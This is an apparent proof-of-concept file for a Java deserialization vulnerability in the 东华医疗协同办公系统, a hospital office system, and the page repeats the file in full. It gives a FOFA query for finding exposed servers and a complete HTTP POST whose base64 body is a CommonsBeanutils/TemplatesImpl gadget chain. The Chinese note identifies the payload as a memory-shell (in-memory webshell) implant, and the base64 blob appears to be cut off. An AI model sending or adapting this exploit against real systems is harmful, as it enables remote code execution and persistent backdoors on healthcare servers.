POC/wpoc/东华医疗协同办公系统/东华医疗协同办公系统反序列化漏洞.md

## 东华医疗协同办公系统反序列化漏洞

## fofa
```
body="东华医疗协同办公系统"
```
## poc
```
POST /workflow/DemoDefinitionProxyServlet/111 HTTP/1.1
Host: xx.xx.xx.xx
Content-Length: 13283
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Origin: https://xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

<@d_base64>rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LPjgGC/k7xfgIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAAAAAAAdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAI3HK/rq+AAAAMQHfAQAlb3JnL2FwYWNoZS9jb21tb25zL2VsL3BhcnNlci9Bc3RNaW51cwcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgcABQEABjxpbml0PgEAAygpVgEABENvZGUMAAcACAoABAAKAQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAApFeGNlcHRpb25zAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uBwAPAQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQATamF2YS9sYW5nL0V4Y2VwdGlvbgcAEwEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QHABUBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQcAFwEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4HABkBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0BwAbAQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UHAB0BABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHAB8BABFqYXZhL3V0aWwvSGFzaE1hcAcAIQEAHmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbgcAIwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyBwAlAQAlb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVxdWVzdAcAJwEAGW9yZy9hcGFjaGUvY295b3RlL1JlcXVlc3QHACkBACZvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2h0dHAvUGFyYW1ldGVycwcAKwEAF2phdmEvdXRpbC9MaW5rZWRIYXNoTWFwBwAtAQASamF2YS91dGlsL0l0ZXJhdG9yBwAvAQAQamF2YS9sYW5nL1N0cmluZwcAMQEAE2phdmEvdXRpbC9BcnJheUxpc3QHADMBAA1TdGFja01hcFRhYmxlAQAHUmVmZXJlcggANgEACWdldEhlYWRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7DAA4ADkLABwAOgEAEmh0dHBzOi8vYmFpZHUuY29tLwgAPAEAEGVxdWFsc0lnbm9yZUNhc2UBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoMAD4APwoAMgBAAQArb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVxdWVzdEZhY2FkZQcAQgEAI2phdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3RXcmFwcGVyBwBEAQAKZ2V0UmVxdWVzdAgARgEAD2phdmEvbGFuZy9DbGFzcwcASAEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAEoASwoASQBMAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABOAE8KACAAUAEALG9yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1Jlc3BvbnNlRmFjYWRlBwBSAQAkamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2VXcmFwcGVyBwBUAQALZ2V0UmVzcG9uc2UIAFYBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwwASgBYCwAcAFkBAARQT1NUCABbAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaDABdAF4KADIAXwoAIgAKAQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsMAGIAYwoAQwBkAQAHcmVxdWVzdAgAZgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABoAGkKACIAagEACHJlc3BvbnNlCABsAQAHc2Vzc2lvbggAbgEACWdldFJlYWRlcgEAGigpTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7DABwAHELABYAcgEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIHAHQBAAhyZWFkTGluZQwAdgBYCgB1AHcBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAAcAeQoAJgB6AQAGbGVuZ3RoAQADKClJDAB8AH0KACYAfgoAJgAKAQANZ2V0RmllbGRWYWx1ZQEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7DACBAIIKAAIAgwEADWNveW90ZVJlcXVlc3QIAIUBAA1nZXRQYXJhbWV0ZXJzAQAqKClMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9odHRwL1BhcmFtZXRlcnM7DACHAIgKACoAiQEAD3BhcmFtSGFzaFZhbHVlcwgAiwEACGVudHJ5U2V0AQARKClMamF2YS91dGlsL1NldDsMAI0AjgoALgCPAQANamF2YS91dGlsL1NldAcAkQEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwwAkwCUCwCSAJUBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMAJcAmAsAMACZAQATamF2YS91dGlsL01hcCRFbnRyeQcAmwEABmdldEtleQwAnQCYCwCcAJ4BAAh0b1N0cmluZwwAoABYCgAEAKEBAAEgCACjAQABKwgApQEACnJlcGxhY2VBbGwBADgoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwApwCoCgAyAKkBAAhnZXRWYWx1ZQwAqwCYCwCcAKwBAARzaXplDACuAH0KADQArwEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwwAsQCyCgAmALMBAAE9CAC1AQADZ2V0AQAVKEkp
```
<@d_base64>参数中 base64编码为内存马payload
first commit 2025-03-04 23:12:57 +08:00			`## 东华医疗协同办公系统反序列化漏洞`

			`## fofa`
			```
			`body="东华医疗协同办公系统"`
			```
			`## poc`
			```
			`POST /workflow/DemoDefinitionProxyServlet/111 HTTP/1.1`
			`Host: xx.xx.xx.xx`
			`Content-Length: 13283`
			`Cache-Control: max-age=0`
			`Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"`
			`Sec-Ch-Ua-Mobile: ?0`
			`Sec-Ch-Ua-Platform: "Windows"`
			`Upgrade-Insecure-Requests: 1`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
			`Origin: https://xx.xx.xx.xx`
			`Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7`
			`Sec-Fetch-Site: same-origin`
			`Sec-Fetch-Mode: navigate`
			`Sec-Fetch-User: ?1`
			`Sec-Fetch-Dest: document`
			`Accept-Encoding: gzip, deflate`
			`Accept-Language: zh-CN,zh;q=0.9,en;q=0.8`
			`Connection: close`

			<@d_base64>rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LPjgGC/k7xfgIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAAAAAAAdXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAI3HK/rq+AAAAMQHfAQAlb3JnL2FwYWNoZS9jb21tb25zL2VsL3BhcnNlci9Bc3RNaW51cwcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgcABQEABjxpbml0PgEAAygpVgEABENvZGUMAAcACAoABAAKAQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAApFeGNlcHRpb25zAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uBwAPAQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQATamF2YS9sYW5nL0V4Y2VwdGlvbgcAEwEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QHABUBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQcAFwEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4HABkBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0BwAbAQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UHAB0BABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QHAB8BABFqYXZhL3V0aWwvSGFzaE1hcAcAIQEAHmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbgcAIwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyBwAlAQAlb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVxdWVzdAcAJwEAGW9yZy9hcGFjaGUvY295b3RlL1JlcXVlc3QHACkBACZvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2h0dHAvUGFyYW1ldGVycwcAKwEAF2phdmEvdXRpbC9MaW5rZWRIYXNoTWFwBwAtAQASamF2YS91dGlsL0l0ZXJhdG9yBwAvAQAQamF2YS9sYW5nL1N0cmluZwcAMQEAE2phdmEvdXRpbC9BcnJheUxpc3QHADMBAA1TdGFja01hcFRhYmxlAQAHUmVmZXJlcggANgEACWdldEhlYWRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7DAA4ADkLABwAOgEAEmh0dHBzOi8vYmFpZHUuY29tLwgAPAEAEGVxdWFsc0lnbm9yZUNhc2UBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoMAD4APwoAMgBAAQArb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVxdWVzdEZhY2FkZQcAQgEAI2phdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3RXcmFwcGVyBwBEAQAKZ2V0UmVxdWVzdAgARgEAD2phdmEvbGFuZy9DbGFzcwcASAEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAEoASwoASQBMAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABOAE8KACAAUAEALG9yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1Jlc3BvbnNlRmFjYWRlBwBSAQAkamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2VXcmFwcGVyBwBUAQALZ2V0UmVzcG9uc2UIAFYBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwwASgBYCwAcAFkBAARQT1NUCABbAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaDABdAF4KADIAXwoAIgAKAQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsMAGIAYwoAQwBkAQAHcmVxdWVzdAgAZgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABoAGkKACIAagEACHJlc3BvbnNlCABsAQAHc2Vzc2lvbggAbgEACWdldFJlYWRlcgEAGigpTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7DABwAHELABYAcgEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIHAHQBAAhyZWFkTGluZQwAdgBYCgB1AHcBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAAcAeQoAJgB6AQAGbGVuZ3RoAQADKClJDAB8AH0KACYAfgoAJgAKAQANZ2V0RmllbGRWYWx1ZQEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9PYmplY3Q7DACBAIIKAAIAgwEADWNveW90ZVJlcXVlc3QIAIUBAA1nZXRQYXJhbWV0ZXJzAQAqKClMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9odHRwL1BhcmFtZXRlcnM7DACHAIgKACoAiQEAD3BhcmFtSGFzaFZhbHVlcwgAiwEACGVudHJ5U2V0AQARKClMamF2YS91dGlsL1NldDsMAI0AjgoALgCPAQANamF2YS91dGlsL1NldAcAkQEACGl0ZXJhdG9yAQAWKClMamF2YS91dGlsL0l0ZXJhdG9yOwwAkwCUCwCSAJUBAARuZXh0AQAUKClMamF2YS9sYW5nL09iamVjdDsMAJcAmAsAMACZAQATamF2YS91dGlsL01hcCRFbnRyeQcAmwEABmdldEtleQwAnQCYCwCcAJ4BAAh0b1N0cmluZwwAoABYCgAEAKEBAAEgCACjAQABKwgApQEACnJlcGxhY2VBbGwBADgoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwApwCoCgAyAKkBAAhnZXRWYWx1ZQwAqwCYCwCcAKwBAARzaXplDACuAH0KADQArwEABmFwcGVuZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWlsZGVyOwwAsQCyCgAmALMBAAE9CAC1AQADZ2V0AQAVKEkp
			```
			`<@d_base64>参数中 base64编码为内存马payload`